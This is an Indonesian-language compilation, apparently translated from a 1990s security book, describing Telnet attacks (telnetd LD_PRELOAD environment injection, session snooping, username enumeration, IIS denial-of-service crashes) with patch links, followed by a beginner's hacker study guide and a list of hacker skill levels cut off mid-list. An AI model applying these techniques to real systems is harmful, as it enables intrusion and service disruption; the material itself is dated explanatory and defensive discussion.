————————————————————————————————————-













PERINGATAN: Kebanyakan distribusi UNIX memiliki daftar lengkap termcap, yang terkadang berisikan ratusan terminal emulation. Jika anda orang baru di UNIX dan mencoba-coba dengan ide untuk menggunakan entri termcap anda, agar sangat berhati-hati. Anda mungkin mengalami keanehan. Dalam beberapa kasus, apa yang terlihat seperti teks yang berbentuk indah mungkin malah terlihat aneh, terlipat, kata-kata yang tidak beraturan dan benar-benar tidak dapat terbaca. Pelajari halaman petunjuk sebelum “bermain-main” dengan file termcap anda.













————————————————————————————————————-













Kebanyakan environment variable yang berbeda dapat diset. Variable ini bisa berpengaruh kuat bagaimana sebuah remote machine akan menerima, memproses dan mendukung koneksi remote telnet anda. Oleh karena itu, Protokol Telnet telah dirancang untuk memungkinkan melalui environment variable tertentu pada saat koneksi. Sebagaimana yang dijelaskan dalam RFC 1408:













Kebanyakan sistem operasi memiliki informasi startup dan environment variable yang berisikan informasi yang semestinya diperluas untuk remote machine saat koneksi Telnet terjadi. Lebih daripada itu membuat sebuah opsi Telnet setiap kali seseorang datang dengan beberapa informasi baru yang perlu mereka sebarluaskan melalui suatu sesi Telnet, tanpa perlu mengetahui sesi Telnet itu sendiri, opsi generic information ini dapat digunakan.













————————————————————————————————————–













Referensi Silang: Untuk melihat RFC 1408, silakan kunjungi http://sunsite.auc.dk/RFC/rfc/rfc1408.html













————————————————————————————————————–













Celah keamanan Telnet yang ada saat ini berlandaskan kemampuan suatu Telnet server untuk menerima, merespon, dan otorisasi yang dilakukan pada environment variable ini. Karena opsi ini telah menjadi keharusan dalam sistem UNIX, sebagian besar platform memiliki celah keamanan terhadap serangan ini.













Celah keamanan ini lebih umum daripada yang diharapkan. Dalam sebuah laporan yang mengherankan, sebuah perusahaan bernama Novatech, telah memposting hasil dari audit keamanan jaringan terhadap 13 host. Didalamnya, ditemukan celah keamanan Telnet sebanyak 138 buah. Hal yang luarbiasa adalah bahwa site tersebut telah di perkirakan memiliki rekening kesehatan, lengkap dengan firewallnya. Berikut ini kutipan dari laporan audit Novatech:













Ini merupakan satu salinan dari laporan sebenarnya dengan definisi dan kemungkinan yang terjadi dari masalah yang sebenarnya. Jaringan milik negara yang terinstall firewall telah diperiksa oleh CERT. sebagaimana yang bisa anda lihat disana terdapat masalah kecil dan sejumlah besar hal lainnya. Ini bukanlah kesalahan administrasi sistem namun suatu kekacauan sistem yang berubah dan perlu perhatian serius dan minimnya pengetahuan tentang bagaimana para intruder mendapatkan akses. Kami mampu memeriksa sistem anda dan menemukan hampir 390 bentuk celah keamanan berlainan yang memiliki jenis akses internet saja.













—————————————————————————————————————













Referensi Silang: Bagi siapa saja yang bersikap “wait and see” mengenai keamanan, saya sarankan agar anda segera mengunjungi situs ini segera dan melihat hasilnya. Benar-benar mengherankan. Lihat hasilnya pada audit pada http://www.novatech.net.au/sample.htm.













—————————————————————————————————————













Baris yang menguak celah keamanan opsi Telnet environment terbaca sebagai berikut:













Dynamic Linker Telnet Vulnerability [High Risk]2













Baris ini melaporkan bahwa sebuah celah keamanan Telnet yang tergolong beresiko tinggi ditemukan (dalam audit sebelumnya, celah keamanan ini ditemukan pada dua host dengan subnet yang sama). [High Risk] 2 merujuk ke tingkat resiko yang digambarkannya. Secara ekstrim, celah keamanan beresiko tinggi. Perlu diingat, celah ini ditemukan pada host yang dilindungi firewall!













Untuk memahami metode tersebut, anda harus benar-benar memahami opsi apa yang bisa dilalui dari client ke server. Seseorang dalam hal ini melaluinya dari sebuah custom libc.













————————————————————————————————————–













CATATAN: libc merupakan standar C library. Sebuah distribusi penuh dari libc pada umumnya berisikan header dan include file yang digunakan dalam pemrograman C. Semua yang berbau UNIX memiliki (atau setidaknya memiliki) library yang terinstall didalamnya. libc diperlukan untuk kompilasi program yang ditulis dalam bahasa pemrograman C.













—————————————————————————————————————













Sam Hartman dari MIT menuliskan dalam artikelnya “Telnet Vulnerability: Shared Libraries”:













Masalahnya adalah bahwa telnetd memperbolehkan client melewati LD_LIBRARY_PATH, LD_PRELOAD dan opsi linker run-time lainnya ke dalam environment proses dari proses yang menjalankan login.













—————————————————————————————————————













Referensi Silang: Artikel Hartman dapat ditemukan di web t http://geek-girl.com/bugtraq/1995_4/0032.html.

Dengan melalui opsi LD_LIBRARY_PATH environment ke server, sang cracker bisa menambahkannya untuk mencari path sebuah custom direktori (dan seterusnya custom library). Hal ini dapat mengubah proses dynamic linking, terutama memperbesar peluang melumpuhkan root.

—————————————————————————————————————

CATATAN: Hartman menuliskan bahwa jika target tersebut menggunakan Kerberos-aware telnetd, hanya user dengan account yang valid pada remote machine yang dapat mengimplementasikan serangan tersebut. Perkiraan saya, biar bagaimanapun, sebagian besar mesin di luar sana tidak menggunakan apa yang dimaksud dengan keamanan Telnet.

Satu catatan menarik mengenai celah ini: Dinyatakan bahwa seseorang dapat mengidentifikasi sesi Telnet dimana environment variable telah dilalui dengan mengeksekusi instrusi ps. Seseorang (Larry Doolittle) menyatakan bahwa klon UNIX tertentu (terutama Linux), dapat memiliki root ke pemrosesan ID tersebut. Menanggapi laporan Hartman, Doolittle menyarankan:

Kernel Linux saat ini tidak mengijinkan akses ke environment string melalui ps, terkecuali pada usernya sendiri. Itulah, /proc/*/environ is protected 400. Hal ini bisa mempengaruhi orang-orang yang membaca instruksi anda, saat mereka melihat environment pada proses mereka sendiri tapi bukan root. Untuk memverifikasi environment string dari login, anda harus menjalankan ps sebagai root.

————————————————————————————————————-

Referensi Silang: Artikel Larry Doolittle dapat ditemukan di http://geek-girl.com/bugtraq/1995_4/0042.html

————————————————————————————————————-

Berikut ini patch untuk berbagai distribusi telnetd:

· DEC. (OSF/1):
ftp://ftp.service.digital.com/public/osf/v3.2c/ssrt0367_c032
· Versi terkompress tersedia pada
ftp://ftp.ox.ac.uk/pub/comp/security/software/patches/telnetd/
· Linux:
ftp://ftp.ox.ac.uk/pub/comp/security/software/patches/telnetd/linux/telnetd
· Red Hat:
http://www.io.com/~ftp/mirror/linux/redhat/redhat/updates/i386/NetKit-B-0.09-1.1.i386.rpm
· SGI (IRIX):
ftp://sgigate.sgi.com/security/

————————————————————————————————————-

CATATAN: Meskipun patch telah diterbitkan untuk mengatasi masalah ini, beberapa modul dan program yang terhubung ke Telnet bisa terpengaruh. Akhir Februari 1997, in.telnetsnoopd dilaporkan sebagai celah keamanan pada LD_PRELOAD melalui beberapa platform, termasuk Linux. Patch untuk mengatasi masalah ini dapat diupload pada ftp://sunsite.unc.edu.

—————————————————————————————————————


Variasi Telnet bukanlah protokol keamanan satu-satunya. Seseorang bisa dengan mudahnya memata-matai sesi Telnet. Kenyataannya, terdapat sebuah utility, bernama ttysnoop, yang dirancang untuk tujuan ini. Sebagaimana yang digambarkan oleh penulisnya, Carl Declerck:

[ttynsoop] memungkinkan anda untuk memata-matai login tty melalui tty-device atau pseudo-tty yang lain. Snoop-tty menjadi sebuah “klon” dari tty yang asli, mengarahkan input dan output dari/untuknya.

————————————————————————————————————–

Referensi Silang: README Declerk pada utility ttysnoop 0.12 (alpha) dapat ditemukan pada web http://ion.apana.org.au/pub/linux/sources/admin/ttysnoop-0.12.README

————————————————————————————————————–

CATATAN: ttysnoop bukanlah snooper Telnet satu-satunya, ia juga mengintai pada tty, bukan pada protokol Telnet. Sebuah network sniffer seperti sniffit juga dapat digunakan (dan mungkin lebih sesuai) untukmengintai protokol Telnet.

————————————————————————————————————–

Sesi Telnet juga tergolong sensitif. Satu alasan untuk hal ini adalah bahwa sesi ini seringkali terkonduksi dalam pola island-hopping. Yakni, user dapat melakukan Telnet ke satu jaringan untuk mengatur halaman webnya; dari sana, user tersebut dapat melakukan Telnet ke mesin lain, dan mesin lainnya lagi, begitu seterusnya. Jika seorang cracker dapat mengintai pada sesi tersebut, dia dapat memperoleh login ID dan password ke sistem lainnya.

Masih Efektifkah Serangan ini?

Tentu saja! Hal ini terutama disebabkan minimnya pengetahuan. Serangan opsi environment ini sebagaimana digambarkan sebelumnya cukup efektif pada sebagian sistem pada saat ini. Hal ini bahkan cukup memberikan indikasi mengenai serangan yang terdapat di Internet.

Telnet sebagai Senjata Ampuh

Telnet merupakan sebuah protokol yang menarik. Sebagaimana yang dijelaskan sebelumnya, seseorang dapat mempelajari banyak hal dengan menggunakan Telnet. Sebagai contoh, anda dapat melihat versi apa dari sistem operasi yang dijalankan. Sebagian besar distribusi UNIX melaporkan informasi ini pada koneksi. Hal ini dilaporkan oleh pihak otoritas yang menyatakan bahwa berbagai scanner yang memanfaatkan isu ini pada koneksinya untuk mengidentifikasi jenis sistem (salah satu scanner bernama SATAN) . Sistem operasi pada umumnya dapat ditentukan dengan menyerang berbagai port ini:
· Port 21: FTP
· Port 23: Telnet (Default)
· Port 25: Mail
· Port 70: Gophe
· Port 80: HTTP
———————————————————————————————————
CATATAN: Meski saya hanya mendaftarkan lima port saja, seseorang bisa saja menghubungkan diri ke sebagian besar port TCP/IP dengan memanfaat suatu sesi Telnet. Beberapa port ini dinyatakan dalam keadaan passive saat koneksi active, dan user tersebut akan melihat tidak ada yang terjadi dalam hal ini. Begitu juga port 80 (HTTP). Anda dapat melakukan valid request dengan sempurna pada port 80 dengan menggunakan Telnet dan jika request tersebut valid, port 80 akan meresponnya. (Request yang tidak diperlukan menjadi valid. Masalah ini akibat kesalahan instruksi GET yang menyebabkan terjadinya respon langsung dari web server jika request tersebut gagal dibuat.)

—————————————————————————————————————
Dalam papernya yang terkenal, “Improving the Security of Your Site by Breaking Into It,” (Memperbaiki Keamanan Situs Anda dengan Membobolnya” Dan Farmer dan Wietse Venema menunjukkan port yang dapat diserang. Khususnya, mereka mengalamatkan masalah tersebut pada port 6000:

X windows biasanya ada pada port 6000… jika tidak dilindungi dengan baik (melalui keajaiban cookie atau mekanisme xhost), window yang ditampilkan dapat ditangkap atau di intai, ketukan keyboard user dapat disadap, program dapat dijalankan secara remote dan sebagainya. Selain itu, jika target tersebut menjalankan X dan menerima Telnet ke port 6000, yang dapat digunakan untuk serangan Denial of Service, yang akan mengakibatkan sistem window korban akan “lumpuh” untuk jangka pendek.

————————————————————————————————————–

Referensi Silang: “Improving the Security of Your Site by Breaking Into It” dapat ditemukan pada situs http://stos-www.cit.cornell.edu/Mark_html/Satan_html/docs/admin_guide_to_cracking.html

————————————————————————————————————–

Dalam paper yang ditulis oleh Farmer dan Venema terdapat banyak serangan yang diimplementasikan dengan Telnet itu sendiri atau dengan bantuan program lain. Salah satu serangan yang dimaksudkan adalah sebuah X terminal:

X Terminal secara umum merupakan client tanpa disk. Yakni, mesin yang memiliki kebutuhan hardware dan software minimum agar terhubung pada sebuah X server. Hal ini sangat umum digunakan pada lingkungan universitas dan memiliki layar 17” atau 19”, sebuah base, keyboard dan mouse. Terminal biasanya mendukung RAM minimal 4 MB namun dapat ditingkatkan hingga 128 MB. X Terminal, juga memiliki client software yang memungkinkan mereka terhubung ke server. Pada dasarnya, koneksinya melalui Fast Ehternet, pengabelan dibalik terminal tersebut. X Terminal menyediakan konektivitas berkecepatan tinggi ke X Server, dilengkapi dengan kekuatan grafis yang tinggi. Mesin ini dijual di Internet dan menjadikan terminal tambahan bagi pengguna rumahan. (terutama sekali untuk pelatihan).

Teknik X terminal Farmer-Venema menggunakan kombinasi rsh dan Telnet untuk membuat serangan yang terkoordinasi. Teknik tersebut meliputi pengaturan beberapa perintah. Cracker menggunakan rsh untuk terhubung ke X terminal dan memanggil program client Telnet yang dimiliki X terminal. Kemudian, outputnya diarahkan ke terminal lokal milik cracker melalui spesifikasi opsi DISPLAY atau variable.

Hal menarik lainnya adalah Telnet dapat digunakan untuk menentukan dengan cepat apakah target tersebut merupakan real atau virtual domain (hal ini dapat dilakukan melalui metode yang lainnya, namun tak seorangpun melakukan fungsi ini dengan cepat). Hal ini dilakukan seorang cracker dengan menentukan secara tepat mesin mesin yang mana yang harus di crack untuk menjangkau resource anda atau ekstrimnya dia mesin yang mana yang harus dilakukan crack.

Pada situasi normal, sebuah real domain merupakan domain yang telah didaftarkan pada InterNIC dan juga memiliki dedicated server. Terkadang dalam kekosongan tersebut terdapat box yang memiliki IP address permanen, dan box tersebut terlampir secara permanen ke Internet via modem 28.8Kbps, ISDN, modem 56Kbps, frame relay, T1, T3, ATM atau mungkin, jika pemiliknya ingin menghemat biaya dengan SONET. Dengan begitu, saat anda melakukan Telnet ke situs sebenarnya, anda menjangkau mesin tersebut dan bukan yang lainnya.



Virtual domains, bisa dikatakan adalah direktori pada real server, alias ke domain name tertentu. Itulah sebabnya, anda membayar ISP untuk meregister domain name anda dna membuat direktori pada disk real server tersebut. Oleh sebab itu, saat user mengetik pada browser mereka ke http://www.nama-perusahaan.com, mereka melalui server ISP tersebut. Kemudian server ISP mengarahkan permintaan koneksi ke direktori anda ke server. Skema virtual domain sangat populer pada beberapa hal, termasuk biaya. Menghemat kesulitan perusahaan anda untuk membuat sebuah real server dan oleh karena itu memangkas biaya-biaya seperti:

· Hardware

· Software

· Pemeliharaan 24-jam


· Technical Support

Pada dasarnya, anda membayar biaya one-time (dan biaya bulanan sesudahnya) kemudian ISP menangani segala sesuatunya. Bagi cracker, hal ini sangatlah penting. Sebagai contoh, jika cracker melakukan crack domain anda—tanpa peduli apakah mesin anda merupakan server sebenarnya—kemungkinan besar mengalami kesulitan. Mereka menganggap bahwa mereka mengcrack sejumlah mesin kecil di dalam kantor, namun yang sebenarnya mereka melakukan serangan yang hebat, pada sebuah network provider terkemuka.

Telnet dengan cepat membongkar identitas server anda. Saat seorang cracker melakukan koneksi Telnet ke http://www.domain-anda.com (dan saat terhubung, melihat nama mesin sebagai sebuah node pada suatu jaringan yang besar), dia segera mengetahui bahwa address anda merupakan sebuah virtual domain.


Terlebih lagi, Telnet dapat digunakan untuk tujuan jahat. Seseorang dapat melakukan serangan brute-force. Saya tidak yakin mengapa serangan brute-force begitu populer diantara cracker muda; hampir seluruh server melakukan bentuk logging saat ini. Meski demikian, teknik tersebut terus bertahan hingga tahun 1990-an. Serangan ini umumnya dibuat dengan menggunakan Telnet client yang memiliki bahasa scripting built-in sendiri. Salah satu aplikasinya adalah Tera Term.


Tera Term merupakan sebuah bahasa yang memungkinkan anda mengotamasi sesi Telnet. Bahasa ini dapat digunakan untuk membangun script yang dapat menentukan username yang valid pada sistem yang menolak untuk memberikan informasi pada finger atau sendmail-expn queries. Versi Telnet yang membongkar informasi ini melalui berbagai cara. Sebagai contoh, jika username palsu diberikan koneksi akan terputus. Namun, jika username valid diberikan, sebuah login: prompt baru akan ditampilkan kembali.



—————————————————————————————————————

Referensi Silang: Tera Term dapat ditemukan pada web http://tucows.phx.cox.com/files/ttermv13.zip


—————————————————————————————————————



Dengan demikian, Telnet merupakan tool yang hebat yang dengna cepat menentukan apakah port tertentu terbuka atau pakah server tersebut menjalankan service tertentu. Telnet juga dapat digunakan sebagai senjata pada serangan Denial-of-Service. Sebagai contoh, mengirimkan data sampah ke port tertentu pada NT Web server yang menjalankan IIS dapat menyebabkan processor korban meningkat hingga 100%. Pembuatan sesi Telnet pada port lain di NT Web server dapat menyebabkan masin tersebut mengalami hang atau crash. Hal ini tentunya terjadi saat melakukan koneksi Telnet request ke port 135.


————————————————————————————————————–

Referensi Silang: Fix untuk masalah ini, telah dikeluarkan oleh Microsoft, dan dapat ditemukan di ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postS


————————————————————————————————————-

Seseorang juga bisa menyebabkan crash pada MS Internet Information Server dengan melakukan Telnet ke port 80 dan membuat GET…/… request. Sebagaimana yang dilaporkan, bagaimanapunjuga, msalah tersebut telah diatasi oleh Microsoft Windows NT SP 2. Jika anda tidak memiliki patch/service pack tersebut, segera dapatkan. Sebuah percobaan bagus untuk hal ini dan masalah lainnya dapat ditemukan pada bahasan Denial of Service, yang diposting oleh Chris Klaus dari Internet Security Systems, didalamnya, Klaus menuliskan:

Layanan file sharing jika ada dna dapat diakses oleh siapa saja dapat menyebabkan crash mesin NT dan harus boot ulang. Teknik ini menggunakan dot.. dot bug pada mesin Windows 95 sangat potensial yang memungkinkan siapa saja untuk mendapatkan akses ke seluruh hard drive… solusi: celah keamanan didokumentasikan pada artikel Microsoft Knowledge Base nomor Q140818 revisi terakhir tertanggal March 15, 1996. Resolusi untuk menginstal service pack terakhir pada Windows NT versi 3.51. Service Pack terakhir yang dikemas untuk patch tersebut ada dalam service pack 4.

—————————————————————————————————————


Referensi Silang: Kunjungi posting mengenai Denial of Service Info di http://geek-girl.com/bugtraq/1996_2/0052.html

—————————————————————————————————————

CATATAN: Celah keamanan ini hanya ada dalam Internet Information Server 2.0 World Wide Web server (HTTP). Versi terakhir IIS dinyatakan telah aman.

—————————————————————————————————————

Terakhir, Telnet sering digunakan untuk membuat fakemail dan fakenews. Para Spammer sering menggunakan opsi ini sebagai ganti dari aktifitas reguler memposting pesan ke Usenet. Terdapat opsi tertentu yang dapat mengatur cara ini yang memungkinkan para spammer menghindari setidaknya beberapa pelindung yang dibuat oleh Spam-Killing robot pada jaringan Usenet.

Kesimpulan

Telnet merupakan protokol yang serbaguna, yang dengan beberapa cara, dapat di buat “secure”. (saya pribadi menyukai SSH sebagai gantinya, untuk pencegahan terhadap sesi Telnet yang di snoop). Dengan demikian, Telnet tidaklah selalu aman di luar sistem tersebut. Jika anda menggunakan software lama (sebelum 1997), periksa lagi apakah memiliki patch yang telah terinstall.


Telnet juga dapat digunakan dalam berbagai cara untuk menyerang atau dengan kata lain mendapatkan ifnormasi dari sebuah remote host (telah dibahas dalam artikel ini). Cukup banyak terdapat teknik serangan Telnet yang terjadi. Jika anda menjalankan sebuah jaringan dan mengaturnya utnuk memberikan user anda akses Telnet, berhati-hatilah. Khususnya bila pada Telnet server yang baru. Server baru ini mungkin saja memiliki bug yang masih belum diketahui. Dan karena Telnet begitu interaktif dan memberikan user begitu banyak kekuasaan untuk mengeksekusi perintah pada mesin remote, banyak celah keamanan pada distribusi Telnet merupakan hal yang kritis. Begitu juga pada FTP atau HTTP yang mungkin bisa lebih buruk lagi.



anda ingin menjadi seorang hacker, tapi tidak mengetahui bagaimana caranya?

Pertama kali, saya akan menciutkan nyali siapapun yang ingin menjadi seorang hacker, hanya karena dia pikir hal tersebut sangat ‘keren’. Anda tidak akan menjadi sangat produktif jika hal tersebut merupakan kendaraan anda. Hal lainnya adalah jangan menjadi bodoh dan menggunakan pre-made script “kiddiot” seperti winnuke, subseven, atau msadc (script ini sangat populer saat saya menulisnya, sekarang adalah unicode). Dan tidak melakukan hal-hal yang bodoh seperti melakukan ‘hack’ untuk mendeface website atau merusak data-data orang lain. Ini namanya kekacauan dan akan menimbulkan benih kebencian, jadi jangan lakukan! Ada banyak kegiatan hacking daripada sekedar mendeface dan merusak komputer orang.

Hal pertama saya akan memetakan sedikit hal yang anda harus ketahui, dengan tujuan untuk apakah hacking itu sejatinya. Anda tidak dapat sekedar membaca tutorial sederhana para hacker dan merasa cukup, itulah mengapa saya sarankan agar membeli bukunya. Dengan tujuan untuk memahami segala sesuatunya. Lainnya, saya sarankan untuk mempelajari pertamakali mengenai ‘Networking’ (Jaringan Komputer). Seperti Network+, A Guide to Networking adalah buku yang bagus untuk para pemula. Upaya sungguh-sungguh tidaklah sekedar membaca buku tersebut, tapi juga memahaminya. Setelah anda membaca buku mengenai Networking secara umum, Perdalam pemahaman anda mengenai TCP/IP. Membaca suatu buku khusus TCP/IP akan meningkatkan pengetahuan lebih baik.

TCP/IP adalah protokol dasar pada internet, dan ketidakpahaman tentang hal ini berarti keterampilan hacking anda terlalu minim. Mempelajari Networking dan TCP/IP merupakan pelengkap anda serta dasar pemahaman dari bagaimana dan mengapa berbagai jenis serangan yang berbeda bekerja. Hal ini menjadikan pemrograman socket anda lebih mudah.

Setelah anda mempelajari keterampilan dasar Networking, bergeraklah ke UNIX. Kata ini mungkin rada-rada menakutkan bagi anda, namun pengetahuan ini mutlak harus dimiliki oleh para hacker. Jalan terbaik untuk mempelajarinya adalah menginstall sistem operasi UNIX pada komputer anda.

Mandrake dan Red Hat adalah 2 distro yang umum digunakan para pemula, dan saya anggap itu adalah alasan yang baik. Kedua distro ini sangat baik dalam mengantar perjalanan anda menuju luasnya dunia *NIX (*NIX disini dimaksudkan untuk seluruh OS mirip Unix). Jika anda membutuhkan suatu buku mengenai Unix, saya sarankan Unix pada suatu Nutshell atau Linux. Terdapat banyak sekali trial and error yang berhubungan dengan dunia Linux. Jalan terbaik adalah mencoba hal-hal yang baru dan lihat apa yang terjadi. Saya sarankan anda memulainya tanpa menggunakan Xwindows. Karena hal ini mengijinkan anda untuk mempelajari lebih jauh, serta menunjukkan kekuatan dan fleksibilitas yang dimiliki Linux. Ingatlah, kegiatan Hacking tidak memiliki GUI (Graphical User Interface) yang bagus. Semuanya didominasi baris perintah dan Pemrograman

Langkah berikutnya yang paling utama, adalah suatu lompatan. Lompatan menuju dunia pemrograman yang sangat sukar, seringkali membuat frustasi dan putus asa, sungguh suatu jalan yang panjang dan lama. Dan… tidak ada jalan pintas untuk hal ini.

Menguasai sekedar Visual Basic atau Pemrograman Batch, cuman dapat melakukan sedikit hacking dengan hal ini. Bahasa C dan Perl adalah bahasa wajib bagi para hacker dikarenakan kemampuan yang powerful dan jangkauannya luas. Meskipun harus mengetahui berbagai bahasa pemrograman, tapi saya hanya menyarankan anda untuk menguasai beberapa bahasa pemrograman, seperti bahasa C, Perl, PHP, ASP dan Java.

Bahasa C mengijinkan anda dalam menemukan celah keamanan suatu program, dan banyaknya eksploit yang ditulis dalam bahasa C. Sedangkan Perl, PHP, ASP dan Java menjadikan anda mengetahui adanya celah keamanan pada script yang dijalankan di internet.

Pelajari tahap-tahap pemrograman dengan seksama, pastikan bahwa anda mengetahuinya dengan sangat baik sebelum melanjutkan. Ingatlah, kebanyakan para hacker adalah programmer yang sangat tangguh. Kembali pada mengetahui bagaimana hal tersebut bekerja, jika anda mengetahui bagaimana suatu Network, Sistem Operasi dan Program tersebut bekerja, anda bisa menemukan cara memanipulasi segala sesuatu dan melakukan apapun yang anda inginkan.

Semua yang dijelaskan diatas perlu anda pelajari selama berbulan-bulan, jadi jangan disibukkan bagaimana langkah selanjutnya. Saya sudah mencoba mempelajari tentang sekuriti sebelum saya memiliki suatu buku. Kebanyakan dari anda seringkali membaca tutorial dan tutorial dari perhackingan serta berbagai Security Paper, tapi buta sama sekali dan tidak memahami mengapa dan bagaimana hal tersebut bekerja. Saya katakan bahwa anda pertama kali anda belajar mengenai computer, kemudian tentang sekuriti. Saya memperhatikan banyak orang-orang pada channel hacking di IRC dan situs-situs hacker yang tidak mengetahui apapun tentang dunia komputer… tapi ingin menjadi hacker

Anda harus mempelajari bagaimana menggunakan suatu komputer dan mengetahui bagaimana hal tersebut bekerja, sebelum mempelajari bagaimana mem-bypass sekuriti dan mematahkannya. Sebuah ujian yang baik adalah, JIKA ANDA TIDAK MENGETAHUI BAGAIMANA MEMBUAT PROGRAM YANG BAIK, JANGANLAH ANDA BERMIMPI UNTUK MENJADI SEORANG HACKER!

Sebagaimana mempelajari tentang sekuriti, saya sarankan anda membaca buku Maximum Security, sebuah buku yang sangat bagus untuk para pemula. Anda harus mengetahui cara melindungi segala sesuatunya. Jangan bersusah-payah dengan berbagai program yang ditampilkan dalam buku, dan jangan mendownload sebuah “hacking tool” tunggal. Kebanyakan hal ini menjadikan komputer anda terinfeksi trojan. Setelah anda mempelajari secukupnya untuk mengetahui apakah tool yang anda perlukan untuk hacking, selanjutnya mencoba beberapa tool seperti Packet Sniffer atau Wingate Scanner.

Sekali anda mengetahui dasar-dasarnya, cobalah membaca milis buqtraq untuk melihat para ahli sekuriti berbicara, dan cara hacking sejatinya. Pada dasarnya mereka satu sama lain menemukan suatu bug dan melihat tanda-tanda yang bisa jadi suatu masalah sekuriti, atau mereka melihatnya melalui kode sumber dan menemukan celah keamanan pada ‘coding’ yang buruk.

Semua ini mungkin terlihat mudah, maksud saya ini hanyalah sedikit pembahasan. Yang jelas anda harus membaca dan memahami konsep yang tersurat sebelum melangkah ke bagian selanjutnya. Atau, anda tidak akan belajar banyak dari topik lanjutan karena anda tidak memiliki kemauan kuat. Setelah berbulan-bulan membaca dan bereksperimen, saya sarankan anda mulai membaca tentang “exploits and security holes” (Eksploitasi dan Berbagai Celah Keamanan). Inilah saat dimana sesuatu mulai melenceng dari jalur sebenarnya. Saat anda mengetahui bahwa terkadang apa yang telah anda pelajari sangat berbeda dengan kenyataan sebenarnya.

Anda mutlak harus mengetahui beberapa urutan pemrograman dan mengetahui sekurang-kurangnya sebuah sistem operasi bekerja. Sekali anda menguasai point ini anda seharusnya mengetahui apa yang harus dilakukan selanjutnya, mencari dan menjadi anggota beberapa komunitas hacker ternama. Setelah perjalanan ini anda akan mendapatkan teknik yang lebih kompleks dan mengetahui berbagai petunjuk yang berbeda.

Tahap dasar terakhir adalah menjaga keutamaan dari eksploit terakhir dan mengambil pengetahuan dari eksploit umum sebelumnya. Pada Sistem Windows ini hal yang sederhana, tapi pada sistem *nix, cakupannya lebih luas diantara berbagai distro dan service yang berbeda.

Ada beberapa website terbaik untuk mendapatkan berbagai eksploit dan laporan keamanan, yaitu:

- http://www.securityfocus.com <== yang terbaik
- http://packetstormsecurity.org

serta beberapa diantaranya yang berisikan tutorial orisinil, seperti:

- http://www.ninjawriters.org
- http://blacksun.box.sk
- http://www.thehackerschoice.org
- http://www.phrack.org
- http://www.axion-network.org

Untuk komunitas terkenal di Indonesia, diantara:

- http://www.jasakom.com
- http://www.kecoak.or.id
- http://www.neoteker.or.id
- http://www.renjana.ws/portal

Bagian dari teka-teki datang secara perlahan-lahan, dan mereka banyak bekerja sama. Namun jika anda mendidik diri sendiri dan teguh hati, anda akan menemukan bahwa metode ini akan menolong anda menjadi lebih berpengetahuan dan melakukan sesuatu dengan computer yang sebelumnya anda pikir tidak mungkin dilakukan. Jika anda melompat satu atau dua tahapan diatas, anda akan mengalami kesulitan serius, dan mengetahui bahwa anda memiliki beberapa keterampilan tapi tidak dapat melakukan banyak dengannya.

JANGAN MAU MENJADI PECUNDANG ATAU PEMBUAL DI CHANEL IRC, YANG CUMAN DUDUK DI DEPAN COMPUTER SEPANJANG HARI BERMAIN GAMES ONLINE, DAN MENYOMBONGKAN DIRI BETAPA BANYAK WEBSITE YANG TELAH DI HACK. Di Chanel IRC, mereka ini menggunakan PsyBNC dengan nick yang aneh-aneh, komunitas script untuk menakut-nakuti para Newbie. Sebenarnya mereka tidak tahu apa-apa

Membaca, Memprogram, dan Pengalaman ekperimental adalah satu-satunya cara untuk menjadi seorang hacker, jangan mengenal kata “malas”. Menjadi seorang hacker adalah lebih dari sekedar memasuki suatu sistem, tapi juga mengetahui bagaimana suatu program bekerja dan mampu membuat bagaimana mereka melakukan apa yang anda ingin mereka lakukan.

Seluruh tahapan ini bukanlah hal yang kaku, banyak orang menempuh cara dan belajar yang berbeda… tapi seringkali memiliki suatu pemahaman yang kuat bagaimana Network, Sistem Operasi itu bekerja, cara memprogram disertai pengetahuan dari bagaimana sekuriti bekerja.
Level-Level Dalam Dunia Hacker

Add caption
Istilah Hacker adalah hal yang tidak asing, terutama bagi mereka yang berada di bidang teknologi informasi. Hacker menurut orang awam identik dengan pelanggar hukum yang melakukan kejahatan di dunia maya misalnya pembobolan rekening bank secara online, mengambil data-data pribadi yang rahasia atau kejahatan lainnya yang berhubungan dengan dunia teknologi informasi.
Dan ternyata didalam dunia Hacker terdapat sebuah level-level atau tingkatan-tingktannya,berdasarkan kemampuan dan keahlian Hacker itu sendiri,nah pada perjumpaan kali ini ane bakal bagi info yaitu level-level atau tingkatan-tingktan,sobat mau tau..???yuk mari ikuti.!!chekkidot
Berikut adalah Level-Level Dalam Dunia Hacker dari yang terendah sampai yang teratas :


5. Lamer


Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.


4. Script Kiddie


Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.


3. Developed Kiddie


Sebutan ini terutama karena umur kelompok ini masih muda (ABG) & masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.


2. Semi Elite


Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.


1. Elite


